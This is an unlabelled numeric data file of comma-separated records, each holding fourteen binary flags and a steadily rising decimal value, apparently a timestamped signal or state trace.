1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0737460e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737468e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737484e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737508e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737532e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737560e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737584e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737612e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737636e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737660e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737684e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737708e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737732e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737760e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737784e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737812e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737836e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737860e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0737908e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0737936e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0737940e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,3.0737960e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0737984e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,3.0738036e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.0738060e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738068e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738084e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738108e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738136e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738160e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738184e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738212e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738236e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738260e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738284e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738308e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738336e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738360e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738388e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738412e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738436e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738460e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738488e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738516e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738540e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738564e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738588e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738612e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738640e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738664e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738692e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738716e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738740e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738764e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738788e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738812e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738840e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738864e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738892e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738916e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738940e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0738964e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0738988e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739012e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739040e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739064e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739092e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739116e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739140e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739164e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739188e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739212e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739240e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739264e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739292e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739316e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739340e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739364e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739388e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739412e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739440e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739464e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739492e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739516e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739540e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739564e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739588e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739612e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739640e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739664e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739692e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739716e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739740e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739764e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739788e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739812e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739840e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739864e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739892e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739916e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739940e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0739964e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0739988e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740012e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740040e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740068e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740092e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740116e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740140e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740168e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740192e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740220e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740244e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740268e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740292e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740316e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740340e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740368e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740392e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740420e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740444e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740468e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740492e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740516e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740540e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740568e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740592e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740620e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740644e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740668e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740692e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740716e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740740e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740768e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740792e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740820e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740844e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740868e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740892e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740916e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740940e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0740968e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0740992e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741020e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0741044e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741068e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0741092e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741116e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0741140e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741168e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0741192e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741220e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0741244e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741268e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0741292e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741316e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0741340e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741368e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0741392e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741420e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0741444e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741468e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0741492e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741516e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0741540e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741568e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0741592e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741620e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0741644e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741668e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0741692e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741716e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.0741740e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.0741764e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0866628e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.0866844e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.0866860e-02 0,1,0,1,1,0,0,0,0,0,0,1,0,1,3.0866892e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.0866916e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,3.0867204e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.0867228e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,3.0867276e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.0867300e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,3.0867324e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.0867348e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,3.0867376e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.0867400e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,3.0867428e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.0867452e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0867460e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0867500e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0867524e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0867548e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0867576e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0867628e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0867652e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0867676e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0867700e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0867724e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0867748e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0867776e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0867800e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0867828e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0867852e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0867900e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0867924e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0867948e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0867976e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0868028e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868052e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0868076e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868100e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0868152e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868176e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0868228e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868252e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0868300e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868324e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0868348e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868376e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0868400e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868428e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0868452e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868476e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0868524e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868548e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0868600e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868628e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0868676e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868700e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0868724e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868748e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0868756e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,3.0868804e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0868828e-02 0,1,0,1,1,1,0,0,0,0,0,0,0,0,3.0868832e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868836e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0868852e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868876e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0868900e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868924e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0868948e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0868976e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0869000e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869028e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0869076e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869100e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0869108e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,3.0869124e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0869148e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869156e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0869176e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869200e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0869228e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869252e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0869300e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869324e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0869348e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869376e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0869428e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869452e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0869500e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869524e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0869576e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869600e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0869628e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869652e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0869676e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869700e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0869704e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,3.0869748e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0869776e-02 0,1,0,1,1,1,0,0,0,0,0,0,0,0,3.0869780e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869784e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0869800e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869828e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0869876e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869900e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0869948e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0869976e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0870028e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870052e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0870076e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870100e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0870124e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870148e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0870176e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870200e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0870252e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870276e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0870280e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,3.0870300e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0870324e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870332e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0870348e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870376e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0870380e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,3.0870428e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.0870452e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870460e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0870476e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870500e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0870524e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870548e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0870600e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870628e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0870652e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870676e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0870724e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870748e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0870800e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870828e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0870876e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870900e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0870924e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0870948e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0870976e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871000e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871028e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871052e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871076e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871100e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871124e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871148e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871176e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871200e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871228e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871252e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871276e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871300e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871324e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871348e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871376e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871400e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871428e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871452e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871476e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871500e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871524e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871548e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871576e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871600e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871628e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871652e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871676e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871700e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871724e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871748e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871776e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871800e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871828e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871852e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871876e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871900e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871924e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0871948e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0871976e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872000e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872028e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872052e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872076e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872100e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872124e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872148e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872176e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872200e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872228e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872252e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872276e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872300e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872324e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872348e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872376e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872400e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872428e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872452e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872476e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872500e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872524e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872548e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872576e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872600e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872628e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872652e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872676e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872700e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872724e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872748e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872776e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872800e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872828e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872852e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872876e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872900e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872924e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0872948e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0872976e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873000e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873028e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873052e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873076e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873100e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873124e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.0873148e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.0873176e-02 